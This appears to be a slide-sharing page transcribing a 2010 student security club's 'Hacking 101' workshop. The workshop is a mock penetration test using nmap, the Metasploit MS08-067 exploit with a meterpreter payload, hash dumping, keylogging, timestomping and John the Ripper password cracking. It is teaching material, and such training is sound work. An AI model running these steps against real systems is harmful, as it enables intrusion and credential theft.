Presentation is loading. Please wait.

Presentation is loading. Please wait.

Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair.

Published byDerick Houston Modified over 7 years ago

Similar presentations

Presentation on theme: "Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair."— Presentation transcript:

1 Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair

2 Tonight Out first “interactive” meeting Introduction to Backtrack A mini penetration test Scenario Outline Enumeration, Exploitation, Post Exploitation Exercise Summary Resources

3 Scenario Company X wants you to test if their internal boxes are secure. They have given you a sample box with the default security settings the company uses for all user workstations. You take it back to the lab and begin to test it...

4 Outline Enumeration OS, services, versions, filters Exploitation Exploit a known vulnerability Get shell access to the box Post Exploitation Shell is just the beginning... ;) Hashes, SSH / GPG keys, pivot

5 Enumeration 'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org nmap [Scan Type(s)] [Options] {target specification} Scan Types -sS, Syn -sT, Connect -sA, Ack … Options -O, OS -sV, services -v, verbose …

6 … Enumeration nmap 192.168.1.1 Default scan, Syn, top 1000 ports nmap -v -sV -O 192.168.1.1 -p 1-65535 Verbose, services, OS, ports 1 through 65535 nmap -PN --script=smb* -sV -O 192.168.1.1 Don't ping, run all smb* scripts, service, OS

7 Nmap Output Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)... OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1... Host script results: | smb-os-discovery: Windows 2000 | smb-enum-domains: | Domain: MITCHELL-32D5C5 | |_ SID: S-1-5-21-606747145-1647877149-725345543 | |_ Users: add, Administrator, Guest, s3cr3tus3r, sally... | Anonymous shares: IPC$ |_ Restricted shares: ADMIN$, C$... | smb-check-vulns: |_ MS08-067: VULNERABLE

8 Exploitation Metasploit – Penetration Testing Framework tools, libraries, modules, and user interfaces # msfconsole msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1 set PAYLOAD windows/meterpreter/bind_tcp exploit

9 Post Exploitation Gather useful information SSH & GPG keys, hashes, etc... Pivot meterpreter > hashdump sysinfo keyscan_(start | stop | dump) timestomp migrate shell

10 … Post Exploitation We dumped the hashes... now what? Pass the hash Crack the hash John the Ripper a tool to find weak passwords of your users John [options] password-files --wordlist --users, --groups --session, --restore

11 … Post Exploitation John --wordlist=/.../password.lst /tmp/hashes.txt Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX]) ABC123 (sally) SECRET (s3cr3tus3r) (Guest) BASKETB (webmaster:1) ALL (webmaster:2) ADMIN1 (Administrator) guesses: 5 time: 0:00:00:00 100% c/s: 25730 trying: SKIDOO - ZHONGGU

12 So... let's get started Boot up to your Backtrack CD passwd /etc/init.d/networking start startx Follow along... let's pwn this box :)

13 Summary Clearly... Company X's default user workstations needs some work. Now let's do the paperwork!... just joking ;) Hopefully this gives everyone a hands on introduction to Backtrack, some essential tools, and the attacker's mindset & process. We want feedback, please!!!! Feedback will steer this organization!!!!

14 Resources utdcsg.org Forums - please register! IRC - irc.oftc.net, #utdcsg Email - info@utdcsg.org Nmap - nmap.org/5/ Metasploit - metasploit.com/ John the Ripper - openwall.com/john/

15 Thanks Next meeting March 24th, 8:30, ECSS 2.306 Cracking WPA ARP spoofing (traffic redirection, password sniffing)

Download ppt "Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair."

Similar presentations

By Bruce Ellis Western Governors University. Demonstrate the need for updating information systems Build security awareness Inform management of the risk.

By Bruce Ellis Western Governors University. Demonstrate the need for updating information systems Build security awareness Inform management of the risk.
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,

 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,
Armitage and Metasploit Penetration Testing Lab

Armitage and Metasploit Penetration Testing Lab
Computer Security Fundamentals

Computer Security Fundamentals
Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning.

Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning.
Offensive Security Part 1 Basics of Penetration Testing

Offensive Security Part 1 Basics of Penetration Testing
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.

A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
© 2010 – MAD Security, LLC All rights reserved ArmitageArmitage A Power User’s Interface for Metasploit.

© 2010 – MAD Security, LLC All rights reserved ArmitageArmitage A Power User’s Interface for Metasploit.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
CSCI 530L Vulnerability Assessment. Process of identifying vulnerabilities that exist in a computer system Has many similarities to risk assessment Four.

CSCI 530L Vulnerability Assessment. Process of identifying vulnerabilities that exist in a computer system Has many similarities to risk assessment Four.
Computer Security and Penetration Testing

Computer Security and Penetration Testing
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.
Penetration Testing.

Penetration Testing.
Penetration Testing Edmund Whitehead Rayce West. Introduction - Definition of Penetration Testing - Who needs Penetration Testing? - Penetration Testing.

Penetration Testing Edmund Whitehead Rayce West. Introduction - Definition of Penetration Testing - Who needs Penetration Testing? - Penetration Testing.
Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m.

Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m.
Hacking Windows 2K, XP. Windows 2K, XP Review: NetBIOS name resolution. SMB - Shared Message Block - uses TCP port 139, and NBT - NetBIOS over TCP/IP.

Hacking Windows 2K, XP. Windows 2K, XP Review: NetBIOS name resolution. SMB - Shared Message Block - uses TCP port 139, and NBT - NetBIOS over TCP/IP.
Port Knocking Software Project Presentation Paper Study – Part 1 Group member: Liew Jiun Hau (20086034) Lee Shirly (20095815) Ong Ivy (20095040)

Port Knocking Software Project Presentation Paper Study – Part 1 Group member: Liew Jiun Hau ( ) Lee Shirly ( ) Ong Ivy ( )
4/13/2010.  CSS Meeting  Stephen Crane on Programming Contests  1pm  Building 8 room 345 05/11/10.

4/13/2010.  CSS Meeting  Stephen Crane on Programming Contests  1pm  Building 8 room /11/10.

Similar presentations

Ads by Google